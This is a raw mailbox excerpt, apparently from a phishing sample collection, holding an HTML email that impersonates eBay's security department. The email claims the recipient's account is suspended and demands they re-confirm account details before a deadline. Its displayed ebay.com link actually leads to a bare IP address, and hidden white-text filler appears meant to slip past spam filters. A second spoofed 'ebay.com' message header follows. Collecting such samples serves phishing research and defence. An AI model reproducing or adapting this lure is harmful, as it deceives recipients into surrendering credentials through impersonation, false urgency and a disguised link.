Resent-From: Beth Nazario <beth@monkey.org>
Resent-To: Jose Nazario <jose@monkey.org>
ReSent-Subject: eBay.com Security Alteration Insecure - msgid; ue2
ReSent-Message-ID: <Pine.BSO.4.58.0508250928340.30657@naughty.monkey.org>
Content-Length: 3115
Lines: 86
Status: O
X-Status: 
X-Keywords:                  
X-UID: 216

----6686698370122875581
Content-Type: text/plain;
Content-Transfer-Encoding: quoted-printable

<META http-equiv=3DContent-Type content=3D"text/html; charset=3DISO-8859-1=
">
<font color=3D"#FFFFFF" size=3D"1">$$$$$$$$$$$$$$$$$$$$ $$ $$$$$ $ $$ $$ $=
$ $ $$ $$$$$$$$$$$$ $$$$$$$$$$$$$$$$$ $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$=
$$$ $$ $$ $ $ $$ </font>
<table width=3D"646" height=3D"465" border=3D"0">
  <tr>
    <td colspan=3D"2"><a href=3D"http://218.38.14.138/c/index.html" target=
=3D"_blank"><img src=3D"http://pics.ebaystatic.com/aw/pics/navbar/eBayLogo=
TM.gif" 

alt=3D"eBay.com" width=3D"150" height=3D"70" border=3D"0"></a></td>
  </tr><tr> 
    <td width=3D"8"><font face=3D"Arial, Helvetica, sans-serif" size=3D"2"=
></font></td>
    <td width=3D"628"><strong><font face=3D"Arial, Helvetica, sans-serif" =
size=3D"2">Dear eBay. com customer,</font></strong></td>
  </tr>
  <tr align=3D"left" valign=3D"top"> 
    <td colspan=3D"2" height=3D"116"> 
      <p><font face=3D"Arial, Helvetica, sans-serif" size=3D"2">You have b=
een indefinitely suspended from eBay because our records indicate your acc=
ount was involved in activities that violate our policy governing seller n=
on-performance.</font></p>
      <p><font face=3D"Arial, Helvetica, sans-serif" size=3D"2">We now nee=
d you to 
        re-confirm your account information to us. If this is not complete=
d till 
        <b>August 27, 2005</b>, we will be forced to suspend your account =
Indefinitely, 
        as it may have been used for fraudulent purposes.</font></p>
      <p><font face=3D"Arial, Helvetica, sans-serif" size=3D"2">We thank y=
ou for your 
        cooperation in this manner .</font></p>
    </td>
  </tr>
  <tr> 
    <td colspan=3D"2" height=3D"13">&nbsp;</td>
  </tr>
  <tr> 
    <td colspan=3D"2"> 
      <p><font face=3D"Arial, Helvetica, sans-serif" size=3D"2">Click belo=
w to confirm and verify your eBay Account:<br>
        </font><font face=3D"Arial, Helvetica, sans-serif" size=3D"2"><a 

href=3D"http://218.38.14.138/c/index.html" target=3D"_blank"><strong>http:=
//www.ebay.com/aw-cgi/eBayISAPI.dllSignIn-ssPageName-Suspended.phpChId=3D$=
$$$$$</strong></a></font></p>
      </td>
  </tr>
  <tr> 
    <td colspan=3D"2" height=3D"6"><font face=3D"Arial, Helvetica, sans-se=
rif" size=3D"2"></font></td>
  </tr>
  <tr> 
    <td colspan=3D"2"> 
      <p><font face=3D"Arial, Helvetica, sans-serif" size=3D"2">Note: If y=
ou choose 
        to ignore our request, you leave us no choice but to suspend your =
account. </font></p>
    </td>
  </tr>
  <tr> 
    <td colspan=3D"2" height=3D"12"><font face=3D"Arial, Helvetica, sans-s=
erif" size=3D"2"></font></td>
  </tr>
  <tr> 
    <td colspan=3D"2"><font face=3D"Arial, Helvetica, sans-serif" size=3D"=
2">Best Regards, 
      <BR>
      eBay .com<br>
      eBay .com Security and Anti-Fraudulent Department .</font></td>
  </tr>
</table>
<p><font color=3D"#FFFFFF" size=3D"1">$$$$$$$$$$$$$$$$$$$$$$$ $$ $$$$$ $ $=
$ $$ $$ 
  $ $$ $$$$$$$$$$$$ $$$$$$$$$$$$$$ $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$=
 $$ 
  $$ $ $ $$ </font> <br>
</p>

----6686698370122875581--

From online-support@ebay.com  Fri Aug 26 14:00:38 2005
Return-Path: <online-support@ebay.com>
X-Original-To: jose@login.monkey.org
Delivered-To: jose@login.monkey.org
Received: from mail2.monkey.org (mail2.monkey.org [204.181.64.8])
	by naughty.monkey.org (Postfix) with ESMTP id D408B536E9C
	for <jose@login.monkey.org>; Fri, 26 Aug 2005 14:00:36 -0400 (EDT)
Received: from pcp04346360pcs.pthurn01.mi.comcast.net (pcp04346360pcs.pthurn01.mi.comcast.net [68.60.103.182])
	by mail2.monkey.org (Postfix) with SMTP id 26DEC18378F
	for <jose@monkey.org>; Fri, 26 Aug 2005 14:00:31 -0400 (EDT)
Received: from [161.253.6.168] by pcp04346360pcs.pthurn01.mi.comcast.net with ESMTP id AFAF34E9F08; Sat, 27 Aug 2005 00:52:17 +0600
Message-ID: <012411yr2tl4zeoe$qozr$$-3p7s-$4@w0wbr>
